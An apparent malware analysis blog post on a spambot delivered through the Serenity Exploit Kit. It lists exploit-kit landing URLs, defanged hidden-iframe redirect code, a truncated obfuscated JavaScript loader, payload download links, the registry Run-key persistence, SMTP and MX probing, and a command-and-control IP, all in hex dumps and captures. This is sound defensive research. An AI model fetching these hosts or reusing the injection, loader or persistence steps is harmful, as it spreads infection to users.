What Serenity Exploit Kit dropped? A Spambot Full Analysis & Samples


We ran into the bunch of url as per hinted by ‏our friend→ @abhinavbom (with Thanks!)
accountpro001.ru/flow08.php
accountpro002.ru/flow08.php
accountpro003.ru/flow08.php
accountpro004.ru/flow08.php
accountpro005.ru/flow08.php
accountpro006.ru/flow08.php
accountpro007.ru/flow08.php
accountpro007.ru/flow4.php
accountpro008.ru/flow08.php
azbuka001.pro/flow08.php
azbuka002.pro/flow08.php
azbuka003.pro/flow08.php
azbuka004.pro/flow08.php
azbuka005.pro/flow08.php
azbuka006.pro/flow08.php
azbuka007.pro/flow08.php
azbuka008.pro/flow08.php
promoution170.ru/flow08.php
promoution208.ru/flow08.php
promoution209.ru/flow08.php
promoution210.ru/flow08.php
promoution212.ru/flow08.php
promoution213.ru/flow08.php
promoution214.ru/flow08.php
promoution215.ru/flow08.php
promoution216.ru/flow08.php
promoution219.ru/flow08.php
www.accountpro003.ru/flow08.php
www.accountpro004.ru/flow08.php
www.accountpro007.ru/flow08.php
Which lead us to the infector urls provided by Serenity Exploit Kit, you can see the explanation of Serenity here --->>[HERE] (Thanks to @Xylit0l) We made investigation of the malware dropped by these urls as per announced in our twitter below with result in txt report here: -->>[HERE]You can see the details of investigation in the dropbox url above and we will review the important point only in this blog post. The scheme of infection is by multiple IFRAME opened by each front url, like flow08.php has about 7(seven) iframe code which meant to redirect you to infector. As per below hexed code:
<iframe src="h00p://azbuka007・pro/flow1.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow2.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow3.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow4.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow5.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow6.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow7.php" width="3" height="3" frameborder="0"></iframe>
↑each IFRAME above will redirect you to below infector↓
h00p://winampgroup.co.uk/k0ff/index.php?s=ag
Which conatins the obfuscated JavaScript like per hexed code below:

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c..
\10\\Q\\1e\\R\\Y\\V\\17+/\\U\',J:C(8){7 5=\'\';7 x,v,y;7 w,q,f,s;7 i=0;..
t.J(u)},M:C(e){7 l=\'\';7 i=0;7 c=0,X=0,k=0,E=0;L(i<e.h){c=e.j(i);r(c<1..
oafdhMx|stxoGt|bvvjiiwja|KbGNual|GugimE|FYBSyrEvgcI|GEWtjFCOO|||str|fun..
90170177131203221200143216237189152211217178178164170167130237226190144..
51891601972371881511781951991441822281871871992131991222012311631642372..
13023722618918116517218814817021819915922423817816819016419014418222718..
02237178131203220180140197241163168237218199159224238178168190226199181..
61751562321771901682212211981811982381882011742271981812362381771672021..
16821121718015519022918516724121719919317323518613019121617612219423818..
20168188152186163176193173171185167173225189159165239187201174217200155..
11991811931771611892112211981432022421641302412271891591972381861512292..
u0056W|u0046GHIJKLMN|224|u004fPQR|u0053TU|128|u0065fghij'.split('|'),0,..
</script></body></html>
If you decode this right it will lead you to the 3(three) malware file links:
winampgroup.co.uk/files/load/combo.jar
win-amps.eu/k0ff/get.php?f=6
winampgroup.co.uk/files/load/libt.php
When I was fetching these urls, get.php?f=6 was only the one that I can fetched, (again, see the text report in the dropbox above for the details) which downloaded you a PE binary file, as per below:
$ bitcat get.php

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 03 6B 20 3B 47 0A 4E 68 47 0A 4E 68 47 0A 4E 68 .k ;G.NhG.NhG.Nh
0090 42 06 41 68 53 0A 4E 68 42 06 11 68 02 0A 4E 68 B.AhS.NhB..h..Nh
00A0 54 02 13 68 45 0A 4E 68 C4 02 13 68 44 0A 4E 68 T..hE.Nh...hD.Nh
00B0 47 0A 4F 68 0C 0A 4E 68 42 06 2E 68 43 0A 4E 68 G.Oh..NhB..hC.Nh
00C0 AB 01 10 68 46 0A 4E 68 42 06 14 68 46 0A 4E 68 ...hF.NhB..hF.Nh
00D0 52 69 63 68 47 0A 4E 68 00 00 00 00 00 00 00 00 RichG.Nh........
00E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00F0 50 45 00 00 4C 01 04 00 6D 1C A5 50 00 00 00 00 PE..L...m..P....
0100 00 00 00 00 E0 00 0F 01 0B 01 07 0A 00 50 00 00 .............P..

PE Image Base : 0x400000
Entry Point: 0x1186
Compile Time: 0x50A51C6D [Thu Nov 15 16:46:37 2012 UTC]
CRC Fail! Claimed: 47607, Actual: 197000
Packer: Armadillo v2.xx (CopyMem II) - additional
Compiler: Microsoft Visual C++ 7.0 MFC
// ↑Traces...
// push 12010h
// push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
// push esi

Sections:
.text 0x1000 0x4da4 20480
.rdata 0x6000 0x16de 8192
.data 0x8000 0x1258 4096
.rsrc 0xa000 0x1f0 4096 <==== packed
We quick checked for threat information about this file and found ourself dissapointed by seeing only unsatisfactory result:
File get.php with MD5 268bece218187c189c2322d6f7d21efb :
DrWeb : Trojan.Spambot.11176
Symantec : WS.Reputation.1
Kaspersky : UDS:DangerousObject.Multi.Generic
So with a bit reversing skill we decided to surgery this malware file by ourself, which ended to many malicious traces below..... (again, see the text report in the dropbox above for the details)

Binary Analysis

It looks packed with Armadillo (see the comment below for this detection/judgement). Also the usage of crypter traces is detected in the binary. So, for the better analysis purpose, be sure to unpack it first. @Xylit0l is kind to provide a video for manual analysis and unpacking w/OllyDbg + PUPE below (enlarge it to see the details) After reversing some codes you'll find the dangerous operations below:
push    offset PathName ; lpFilename
push 0 ; lpModuleName
call ds:GetModuleHandleA
push eax ; hModule
call ds:GetModuleFileNameA
push 1036640h ; dwBytes
push 0 ; dwFlags
:
LPSTR GetCommandLineA(void)
extrn GetCommandLineA:dword ; DATA XREF: start:loc_40128B
:
.idata:00406038 ; BOOL __stdcall
WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped)
.idata:00406038 extrn WriteFile:dword ; DATA XREF: __NMSG_WRITE+155
:
; Microsoft VisualC 2-8/net runtime
; Attributes: library function
unknown_libname_1 proc near
arg_0= dword ptr 4
push offset ModuleName ; "mscoree.dll"
call ds:GetModuleHandleA
test eax, eax
jz short loc_401380
It was enough to tell us that it writes file, it executes foreign code, and it shows serious internet activities.

Behavior analysis

The next step is to test it, we did it as per below steps.. We just run it... The sample was self deleted saved into different location + it runs evil SVCHOST: Well let's see what this SVCHOST does, by monitoring its activity. Windows task manager provided enough facilities for this purpose: ↑you can see so many SMTP connections made by this binary. Then what exactly these SMTP connection does? What malicious act? We captured everything with reghot, wireshark & memory dump inside the testPC, outside the box w/tcpdump to study this malware malicious acts.

What's the malware's malicious file operation?

Malware file is self deleted & move itself to here:
C:\Documents and Settings\rik\jjsrdpce.exe
Drops some temp files here:
C:\DOCUME~1\...\LOCALS~1\Temp\0706.bat
C:\DOCUME~1\...\LOCALS~1\Temp\3366.bat
C:\DOCUME~1\...\LOCALS~1\Temp\8160.bat
C:\DOCUME~1\...\LOCALS~1\Temp\6783.bat
C:\DOCUME~1\...\LOCALS~1\Temp\7686.bat
C:\DOCUME~1\...\LOCALS~1\Temp\1438.bat

What this binary had done in registry?

A malware autorun component registered as per below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\
Software\Microsoft\Windows\CurrentVersion\Run\MSConfig:
""C:\Documents and Settings\rik\jjsrdpce.exe""
A huge ASCII binary data was saved in registry at below record...
HKLM\SOFTWARE\Microsoft\DeviceControl\DevData: C3 6A 05 ..
74 D9 4E 39 85 63 D5 B1 2A 97 64 D7 89 25 BF 5B F5 91 2..
12 EB 03 9D 39 E2 57 31 8B 0E ED 40 3F 9A 74 D3 53 26 8B..
3 EF 89 25 BF EC 9C 91 2B C7 13 9A E3 41 B4 01 61 F8 5D ..
75 11 AB 47 E1 7D 17 B3 4D 52 82 1F B9 05 01 80 25 E4 7..
FD E4 41 BB 36 77 F6 54 B0 6F 26 94 76 ED 46 27 9B 7E D7..
E 3F 93 7F C5 A1 0F EB 71 DD BB 07 ED 49 DD DF 46 A1 0A ..
98 20 AE 13 78 C2 61 80 40 28 B9 3F C9 ED 76 CB 33 83 F..
45 AE 13 88 EB 5F E6 36 5A B6 64 8A 7B 4E 87 70 D7 DF 6D..
7 26 84 E0 70 CE 21 AE F9 42 A0 39 F7 A0 1D C9 17 96 F4 ..
A7 18 67 DE 61 B9 12 75 C8 3B 91 1A 7D 95 62 CB B1 0F 8..
5D F7 93 4D E7 52 6D 5D 35 CF 6B 05 06 4D D7 72 0D A7 43..
9 11 76 C1 6F 8A F3 40 D2 3B 90 EF 4B A6 57 8A E6 5C B9 ..
06 A1 3B D7 75 0D A7 43 22 86 13 AF F1 E5 7F 1B B5 51 E..
48 AF 42 B0 3C 1B AE 24 A0 76 1A C4 14 E3 86 8F F7 02 F2..
3 BE 49 F5 7F 1B B5 53 EB 87 25 BD 57 F3 8D 29 C3 5F FD ..
35 D1 6B 07 A1 3D D7 73 0D A9 43 DF 79 15 AF 4B E5 81 1..
BD 57 F3 CD 29 C3 1F D7 F1 4E BF 04 01 9B 37 05 6A 07 A3..
3 DF 79 15 AF 4B E5 81 1B B7 51 ED 87 23 BD 59 F3 8F 29 ..
65 01 9B 37 D1 6D 07 A3 3D D9 73 0F A9 45 DF 7B 15 B1 4..
: :
B7 30 F1 F6 58 E5 08 6C FC 5F B2 43 67 C6 11 AC 06 05 C8..
8 8E F3 7E DB 36 9E E6 45 DC 38 87 EA 05 AA 13 9C 9D 52 5..
05 40 A8 3F F4 59 2F E2 45 E1 7B 17 B6 4D E7 83 38 EB 1 ..
AA D8 64 97 25 F1 B2 63 83 23 5C CA 76 81 2B 29 80 6D 95..
2 59 F4 1F B8 CF 52 FE 1A A1 B8 25 BF 5B 13 EE 7C A8 AE 7..
EA 6D A5 3E 4C AF 12 B4 55 79 DF 33 91 47 38 9C 3D 86 E ..
25 BF 3D D1 A9 D7 8D 61 FD 97 33 40 4E 03 9C 39 D5 6F 4F2..
6 60 E1 7E 17 B3 4D BA C2 79 DF 3A 9D EF 44 A3 37 92 B1 E..
B8 1B 62 F1 5A B0 4F 5F CA 25 BA 0E 1B F8 37 C3 29 76 9..
55 EF FB 56 AC 2F 87 CE 59 A6 10 96 99 33 CF 69 05 9F C1..
B 77 11 AC 47 E3 7D 5B FF 0E A7 CE 1F FE 75 C0 AB 11 F1 ..

What networking / what kind of spam activities?

Malware grabs your IP & gateway hostname, by reversing your IP ARPA record, and then ask every MX record possibilities of every possible subdomains:
24  256.711421  TestPC  8.8.8.8  DNS  Standard query PTR 105.83.110.xxx.in-addr.arpa
25 256.850845 8.8.8.8 TestPC DNS Standard query response PTR p6e5369.sitmnt01.ap.MyDomain
429 270.887803 TestPC 8.8.8.8 DNS Standard query A smtp.p6e5369.sitmnt01.ap.MyDomain
431 270.966472 TestPC 8.8.8.8 DNS Standard query A mail.p6e5369.sitmnt01.ap.MyDomain
435 271.254438 TestPC 8.8.8.8 DNS Standard query A sitmnt01.ap.MyDomain
437 271.332410 TestPC 8.8.8.8 DNS Standard query A smtp.sitmnt01.ap.MyDomain
439 271.410546 TestPC 8.8.8.8 DNS Standard query A mail.sitmnt01.ap.MyDomain
441 271.489836 TestPC 8.8.8.8 DNS Standard query MX sitmnt01.ap.MyDomain
443 271.571450 TestPC 8.8.8.8 DNS Standard query A ap.MyDomain
451 273.886911 TestPC 8.8.8.8 DNS Standard query A smtp.ap.MyDomain
453 273.974856 TestPC 8.8.8.8 DNS Standard query A mail.ap.MyDomain
455 274.052129 TestPC 8.8.8.8 DNS Standard query MX ap.MyDomain
456 274.148586 8.8.8.8 TestPC DNS Standard query response MX 100 mailgate.MyDomain
457 274.149148 TestPC 8.8.8.8 DNS Standard query A mailgate.MyDomain
Then, it searched for microsoft.com's, yahoo.com's, google.com's & mailru's MX info.
000002B0  e2 68 01 00 00 01 00 00  00 00 00 00 09 6d 69 63 .h...... .....mic
000002C0 72 6f 73 6f 66 74 03 63 6f 6d 00 00 0f 00 01 rosoft.c om.....

000002CF 61 15 01 00 00 01 00 00 00 00 00 00 04 6d 61 69 a....... .....mai
000002DF 6c 09 6d 65 73 73 61 67 69 6e 67 09 6d 69 63 72 l.messag ing.micr
000002EF 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 osoft.co m.....

00000329 78 9f 01 00 00 01 00 00 00 00 00 00 05 79 61 68 x....... .....yah
00000339 6f 6f 03 63 6f 6d 00 00 0f 00 01 oo.com.. ...

00000344 fb ec 01 00 00 01 00 00 00 00 00 00 04 6d 74 61 ........ .....mta
00000354 37 03 61 6d 30 08 79 61 68 6f 6f 64 6e 73 03 6e 7.am0.ya hoodns.n
00000364 65 74 00 00 01 00 01 et.....

00000398 33 17 01 00 00 01 00 00 00 00 00 00 06 67 6f 6f 3....... .....goo
000003A8 67 6c 65 03 63 6f 6d 00 00 0f 00 01 gle.com. ....

000003B4 a4 49 01 00 00 01 00 00 00 00 00 00 05 61 73 70 .I...... .....asp
000003C4 6d 78 01 6c 06 67 6f 6f 67 6c 65 03 63 6f 6d 00 mx.l.goo gle.com.
000003D4 00 01 00 01

0000045C 2a 50 01 00 00 01 00 00 00 00 00 00 04 6d 61 69 *P...... .....mai
0000046C 6c 02 72 75 00 00 0f 00 01 l.ru.... .

00000475 fd 90 01 00 00 01 00 00 00 00 00 00 03 6d 78 73 ........ .....mxs
00000485 04 6d 61 69 6c 02 72 75 00 00 01 00 01 .mail.ru .....
in additional it tried to connect to "static.203.81.4 0.188.clients.yo ur-server.de"
000008FA  80 a5 81 80 00 01 00 01  00 00 00 00 03 32 30 33 ........ .....203
0000090A 02 38 31 02 34 30 03 31 38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000091A 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000092A 00 01 00 00 a8 be 00 2d 06 73 74 61 74 69 63 03 .......- .static.
0000093A 32 30 33 02 38 31 02 34 30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
0000094A 69 65 6e 74 73 0b 79 6f 75 72 2d 73 65 72 76 65 ients.yo ur-serve
0000095A 72 02 64 65 00 r.de.
0000095F 80 a5 81 80 00 01 00 01 00 00 00 00 03 32 30 33 ........ .....203
0000096F 02 38 31 02 34 30 03 31 38 38 07 69 6e 2d 61 64 .81.40.1 88.in-ad
0000097F 64 72 04 61 72 70 61 00 00 0c 00 01 c0 0c 00 0c dr.arpa. ........
0000098F 00 01 00 00 a8 bc 00 2d 06 73 74 61 74 69 63 03 .......- .static.
0000099F 32 30 33 02 38 31 02 34 30 03 31 38 38 07 63 6c 203.81.4 0.188.cl
000009AF 69 65 6e 74 73 0b 79 6f 75 72 2d 73 65 72 76 65 ients.yo ur-serve
000009BF 72 02 64 65 00 r.de.
The next thing is it established connection to 188.40.81.203 via remote-as Test PC←→188.40.81.203 via TCP/2053(remote-as) ⇒36063 Seq=142 Ack=258 Win=16687 Len=1412
000004AD  51 a4 30 4e fc 53 fe b5  61 b5 1c bc b8 40 d0 6e Q.0N.S.. a....@.n
000004BD 14 53 dc c7 9a 14 36 e1 33 74 de d7 d7 c1 ae 52 .S....6. 3t.....R
000004CD 34 c6 d3 53 08 16 4f 95 d2 a1 2c ca 1e ce fa 38 4..S..O. ..,....8
000004DD 16 27 31 e8 a8 09 fb c3 e6 df d2 2f 72 86 6a e0 .'1..... .../r.j.
000004ED 97 27 bc ce 43 9d 36 1b 1e 9a 46 42 52 0a 0b d6 .'..C.6. ..FBR...
000004FD 9f b2 8e 3f 87 e9 75 8b ba 83 da f8 d7 0c 68 85 ...?..u. ......h.
0000050D 7b d9 4c 5f 85 a8 52 48 c1 7f 9d a7 89 87 64 0d {.L_..RH ......d.
0000051D 0f 21 83 d1 dc 71 1e c8 19 58 8d 26 de 7e 6e e7 .!...q.. .X.&.~n.
0000052D ff 9d 0e 23 7f 9a 63 75 7f e3 3a ed 43 37 93 f3 ...#..cu ..:.C7..
0000053D 10 63 3d 53 a4 c6 d9 29 51 a6 69 e1 89 dc db 70 .c=S...) Q.i....p
0000054D 65 1d ea 7e ef 1c de a0 3a ab 3d da 4b eb 2b c3 e..~.... :.=.K.+.
0000055D 20 56 a4 86 95 54 5b cd 98 7d ae 4c a3 13 74 92 V...T[. .}.L..t.
0000056D b5 53 da ff ce 6a 07 2a 18 ec 54 cd 5c bc ca cd .S...j.* ..T.\...
0000057D bd e2 19 49 39 5d a0 14 c7 66 6b 3d da 80 a4 33 ...I9].. .fk=...3
0000058D a7 e0 fe 7d b2 c1 83 d3 cb 3c 1f 88 8d 02 a3 52 ...}.... .<.....R
0000059D 84 fb ff ee 0d fe 28 7a 37 8f b1 76 92 74 ee c7 ......(z 7..v.t..
000005AD e8 e0 07 d0 37 93 81 a2 9d 13 c5 f7 f5 48 fd e4 ....7... .....H..
000005BD 36 54 7a 41 8c a7 72 3f dc af 1b ff b6 fd 9e 01 6TzA..r? ........
000005CD 81 d4 ad 49 a0 74 c5 f7 0f ca 6a f8 7c 71 35 75 ...I.t.. ..j.|q5u
000005DD 3e 24 20 0f 1f 36 5e b4 89 54 77 91 e3 f2 92 bf >$ ..6^. .Tw.....
000005ED d3 63 1a 5e ef a2 7c 83 7c 43 9c 58 7a ea e8 fe .c.^..|. |C.Xz...
000005FD 48 eb cb 67 66 03 9e 7d bb 71 b1 35 b4 fe f3 57 H..gf..} .q.5...W
0000060D 17 33 2b 9b .3+.
00000611 e3 37 a9 bd 15 0c 6b f7 54 67 2f 12 ee de 30 79 .7....k. Tg/...0y
00000621 17 b7 46 a7 55 98 65 34 59 c9 1b e5 19 6b 94 a9 ..F.U.e4 Y....k..
00000631 55 bd 9f d3 28 6c ae 94 94 7d e0 35 7c bd ca 16 U...(l.. .}.5|...
00000641 e0 27 fd 49 8e ce 48 1d e7 f8 65 c0 f9 39 94 0e .'.I..H. ..e..9..
00000651 4a 0d 91 ee 3c e7 9b 83 86 d2 a6 29 00 4a f8 50 J...<... ...).J.P
00000661 03 11 68 08 f6 a4 3a 8a cb f1 b0 f0 5e e3 78 44 ..h...:. ....^.xD
00000671 cc e7 ce 68 e1 f5 d5 ab 98 1a 73 08 fa f2 4c 1c ...h.... ..s...L.
00000681 ca 01 dd e6 13 61 01 9b 83 b8 66 3c 86 .....a.. ..f<.
0000068E 1f 5c 26 ed 03 ab b2 07 77 f6 01 06 84 cf 53 1f .\&..... w.....S.
0000069E 68 82 33 35 dd 64 d8 e0 c7 h.35.d.. .
00000101 bb 06 46 52 d6 59 2e aa d1 72 03 28 2b b5 c1 98 ..FR.Y.. .r.(+...
00000111 4d 1d 88 49 74 c2 46 e0 48 43 97 d5 b5 97 ef af M..It.F. HC......
00000121 00 c4 8b 93 65 98 69 0a 5c 78 72 44 9f c3 40 99 ....e.i. \xrD..@.
00000131 71 69 e3 56 7b 09 b3 fe f4 qi.V{... .
000006A7 c0 7f 48 a1 64 70 23 1d 03 eb 9f 07 2b de da 3c ..H.dp#. ....+..<
000006B7 a4 8b 4b 16 ea e7 9a ea 65 62 6b 2e af 67 bb eb ..K..... ebk..g..
000006C7 79 a8 f1 3a 34 da ab 7a 56 84 dd 9c 27 0c 6d 72 y..:4..z V...'.mr
000006D7 a5 35 a4 55 71 d3 e7 3c aa 6e 30 af 6a 94 00 58 .5.Uq..< .n0.j..X
000006E7 58 X
000006E8 b5 e9 21 3b f8 10 ad 44 3d 05 ca e0 c1 a1 22 4d ..!;...D =....."M
000006F8 dd 9b 3c 25 26 27 28 29 10 32 42 ..<%&'() .2B
00000703 96 13 31 92 e1 a5 35 d9 b3 42 d7 6c 67 d0 0b 30 ..1...5. .B.lg..0
00000713 c9 5b 8a 81 a8 1f 33 a3 00 ec 5d 68 28 59 52 0e .[....3. ..]h(YR.
00000723 ef e2 90 e4 75 9d 79 2c 56 22 41 4a d0 07 fe f8 ....u.y, V"AJ....
00000733 dc fb 07 5a d5 be 5d c8 08 14 b8 1b f0 6c 1d 4c ...Z..]. .....l.L
00000743 dc 85 ec 76 83 5a 0f 67 52 0b 36 84 08 a2 0a ba ...v.Z.g R.6.....
00000753 58 97 77 24 c3 62 c2 86 fc dd 99 5a d7 8c 61 3a X.w$.b.. ...Z..a:
00000763 74 46 1e 85 76 e8 74 2b ed 18 3d cb 75 d0 e8 c8 tF..v.t+ ..=.u...
00000773 d5 ed c2 53 d8 e7 d5 42 52 44 58 b3 33 c2 bf 90 ...S...B RDX.3...
00000783 19 44 bc 9c 3e c3 .D..>.
00000789 7b f7 c4 e5 d8 5c 84 05 0a 11 80 96 45 91 d5 3d {....\.. ....E..=
00000799 64 96 12 90 47 47 76 89 de 6a 90 45 8e 09 34 19 d...GGv. .j.E..4.
000007A9 c6 ef 7e 3d 6e 3e 6a 1b c2 27 4c 28 32 97 ee 35 ..~=n>j. .'L(2..5
000007B9 4a ff J.
000007BB 22 45 43 25 a6 8a 4a 6a 11 cf b2 09 a0 8a 2d 98 "EC%..Jj ......-.
000007CB dd ad f0 a2 35 c0 3b 45 62 49 95 51 e1 ....5.;E bI.Q.
000007D8 93 4d 90 ae fb c6 78 08 17 6b ec 92 72 3c b6 01 .M....x. .k..r<..
000007E8 f2 9e 51 1a 36 6e 56 7f 82 ..Q.6nV. .
0000013A 06 13 2b 00 91 16 25 13 80 90 82 96 f0 71 00 fd ..+...%. .....q..
0000014A ce ef 9a fa da 7c 01 a0 35 .....|.. 5
IF the connection established, it gives you download OTHER malicious binary:
// Sending another malware shits via below TCP follows.....
00000000 7c fd 5e eb 50 b2 cc e1 b8 6a f0 6b fd 65 9d 9a |.^.P... .j.k.e..
00000010 60 ab 6a f7 1d a3 14 e4 6d d9 b3 8a 30 94 9c 4e `.j..... m...0..N
00000020 0f c3 eb e5 8a 49 42 31 73 66 f2 fc 51 cc f5 9a .....IB1 sf..Q...
00000030 ed ff 54 37 93 7e d3 30 e6 58 4d f7 f5 56 c4 d7 ..T7.~.0 .XM..V..
00000040 dd d4 dc 30 80 b0 4e bf 85 f7 d0 66 5b 12 77 e8 ...0..N. ...f[.w.
00000050 ec 3e c6 b1 ff de 8a f7 e1 35 a6 e7 da 61 91 9b .>...... .5...a..
00000060 67 fd d3 14 ed 59 44 d5 75 8f da a4 1a 8c f3 0f g....YD. u.......
00000070 9f 60 65 0b d7 2a cc 7a 4b 88 7d a7 6d ee da 0b .`e..*.z K.}.m...
00000080 66 05 1e c6 08 76 85 1a e6 05 16 86 1a e6 01 3e f....v.. .......>
00000090 11 cd c2 6b 63 5d 23 9b bf c4 3f 74 2f 85 bd bc ...kc]#. ..?t/...
000000A0 bb a3 ac 45 b5 f2 38 ea 82 4b fd 19 24 bb 9c 24 ...E..8. .K..$..$
000000B0 0f 72 61 1b 42 e0 eb 6b a6 01 83 ac 9f 97 67 30 .ra.B..k ......g0
000000C0 1a 8b 21 68 a3 cf 3c 65 ..!h..00000000 de 67 53 49 f8 26 54 e0 df 69 a5 7c 39 ea f0 9f .gSI.&T. .i.|9...
00000010 d6 ea 87 f6 82 60 79 db 4e 97 f3 a1 e9 ea e5 f0 .....`y. N.......
00000020 00 4f d4 b6 2c 0a b7 a2 3d 92 78 07 5a d5 56 9d .O..,... =.x.Z.V.
00000030 73 4e ba ce 48 f2 5f 86 76 e5 05 bd 7f 58 8e 6e sN..H._. v....X.n
00000040 8f 86 46 9b 3e a8 2f 0e 4f 20 c6 18 a9 0c 48 fb ..F.>./. O ....H.
00000050 b6 73 90 d8 c0 2a 44 68 c0 b9 06 30 a4 71 ac e4 .s...*Dh ...0.q..
00000060 6a 24 71 3b e3 fd fb a2 e1 b3 4d 6b 1e 48 d6 b5 j$q;.... ..Mk.H..
00000070 ed a2 75 e0 7f 2a 2a 32 77 11 c1 ce f6 a0 a5 f4 ..u..**2 w.......
00000080 5a c6 be db c7 65 e1 90 f6 f1 8d 22 77 Z....e.. ..."w
000000C8 8a 67 53 49 ac 26 54 e0 4c 80 c0 80 39 ea f0 9f .gSI.&T. L...9...
000000D8 d6 76 1f 8a 7d 9f 86 24 5d 93 f3 a1 e9 ea e5 f0 .v..}..$ ].......
000000E8 00 a4 a8 f2 ee 4a df 62 fe 92 b8 c7 99 c5 a2 22 .....J.b ......."
000000F8 b0 4c 72 ce 48 f0 5f 76 a4 .Lr.H._v .
0000008D 30 a0 fe 41 28 42 c9 0a 07 24 e9 83 d3 30 2e 99 0..A(B.. .$...0..
0000009D 49 e8 9a 3b e3 a6 2a bb b5 48 dd 7c 1f 5f 09 b7 I..;..*. .H.|._..
000000AD 3c ce af 72 8a 19 39 da 2b 9e 13 26 44 8a af ab <..r..9. +..&D...
000000BD 13 f8 1f ee f1 d8 d5 b1 79 de 6d ba 95 00 57 36 ........ y.m...W6
000000CD bc cb 09 2b 8f 1b 0f 22 ee af 00 fc f8 93 e0 03 ...+..." ........
000000DD df 40 d0 61 19 bc 9a 4e 8f 36 e1 6e 63 af d6 b0 .@.a...N .6.nc...
000000ED 83 .
000000EE 15 42 9d 01 e0 72 ba 69 b7 e2 d6 7c 52 09 35 2d .B...r.i ...|R.5-
000000FE 55 eb dd 58 f9 1a 54 15 40 U..X..T. @
00000101 c5 05 bd 7f 78 8e 6e 8f e5 e1 be 2d df 2c 0e 4f ....x.n. ...-.,.O
00000111 03 7e 00 a9 0c 48 fb b6 b3 83 de 94 2a b1 86 cf .~...H.. ....*...
00000121 b9 06 81 2c c6 fd 70 aa e7 71 fb 23 3e fb 56 5e ...,..p. .q.#>.V^
00000131 70 4d a3 1e 48 d6 b5 1d 70 pM..H... p
00000107 d3 88 2c cc 87 27 d7 0b 21 41 73 26 78 6a ba 77 ..,..'.. !As&xj.w
00000117 ca 96 47 e2 8d 04 db 8b c1 c8 93 05 95 4d f0 88 ..G..... .....M..
00000127 6a 2c 7e 93 f8 00 96 1e 8c 5f 67 ab 74 19 b8 4e j,~..... ._g.t..N
00000137 72 91 d6 ab 8e 47 47 7a 89 80 2c 17 63 2d ca 48 r....GGz ..,.c-.H
00000147 ff .
00000148 f5 d4 8e 07 95 27 39 a1 87 7b 27 cb ae 1b ea 39 .....'9. .{'....9
00000158 88 10 ea 4b 95 1a ce ac 59 ...K.... Y
0000013A 35 e1 7f 2a 6a 33 77 11 b1 e7 4d ef a4 f6 5a c6 5..*j3w. ..M...Z. <==== See this? A PE file...
0000014A be 63 df 65 e1 90 f6 f1 8d 3b 77 78 a0 89 32 3f .c.e.... .;wx..2?
0000015A 30 ac 69 20 82 8f ef d2 32 2e 99 49 50 f8 61 93 0.i .... 2..IP.a.
0000016A 56 36 ba b5 49 dd db 69 28 65 c5 57 91 f1 20 d6 V6..I..i (e.W.. .
0000017A 33 13 f0 01 b4 39 0c 6e 5a 65 90 b7 5d 6b 80 92 3....9.n Ze..]k..
0000018A ac bf 12 05 fd 1f df f6 6e 30 58 d5 dd 0f 26 89 ........ n0X...&.
0000019A 57 46 6e a3 85 d0 d1 d2 b9 ca 29 f5 85 34 89 d8 WFn..... ..)..4..
000001AA 2b dd 6e e7 42 95 1e 10 96 f9 9f eb 7c 32 ee 64 +.n.B... ....|2.d
000001BA 92 04 d3 0a d2 cc ba 15 25 6c 1b 4e 3a 3e ea 3f ........ %l.N:>.?
000001CA 9c 6e 3c 7c 30 d5 fb 5e aa 90 41 be 6f ad 23 c0 .n<|0..^ ..A.o.#.
000001DA b9 51 1e d6 0f e3 71 00 c4 e4 60 e6 d4 9e be bb .Q....q. ..`.....
000001EA 66 fc 29 d9 d7 35 0a 13 f8 8c 3d e4 6b a1 0d 32 f.)..5.. ..=.k..2
000001FA 8d 12 6b 85 2f 07 f5 bf c4 a8 24 7a 4b 83 f0 0c ..k./... ..$zK...
0000020A 7f 0a 5d ac 3a 8b 9a bf eb 69 b5 4f 50 d1 e1 09 ..].:... .i.OP...
0000021A 53 a4 c4 7e 84 03 aa 88 d0 41 e5 3a af d9 3d 79 S..~.... .A.:..=y
0000022A e3 58 e6 a5 a6 ff ed af 4b 75 86 7f b1 ce 63 f6 .X...... Ku....c.
0000023A 75 8b 65 39 34 47 18 97 fa ff 95 f9 b2 89 20 b5 u.e94G.. ...... .
0000024A a4 e8 d4 e5 a6 77 b2 dd 15 61 c7 3b 0a f5 6f 3a .....w.. .a.;..o:
0000025A 40 87 8f 9c d9 39 f6 97 36 6d 5a 6e 6d 03 49 de @....9.. 6mZnm.I.
0000026A b5 f2 ae 5f 18 eb 9d 66 ee 5f e0 2f 10 90 d1 fd ..._...f ._./....
0000027A b5 68 e1 36 e6 5b ba 3d 50 57 d6 c7 7e a8 96 e6 .h.6.[.= PW..~...
: : : :
000511DD f8 dc 2c bf c6 fe d4 42 40 ed 52 2f af 4c d3 b2 ..,....B @.R/.L..
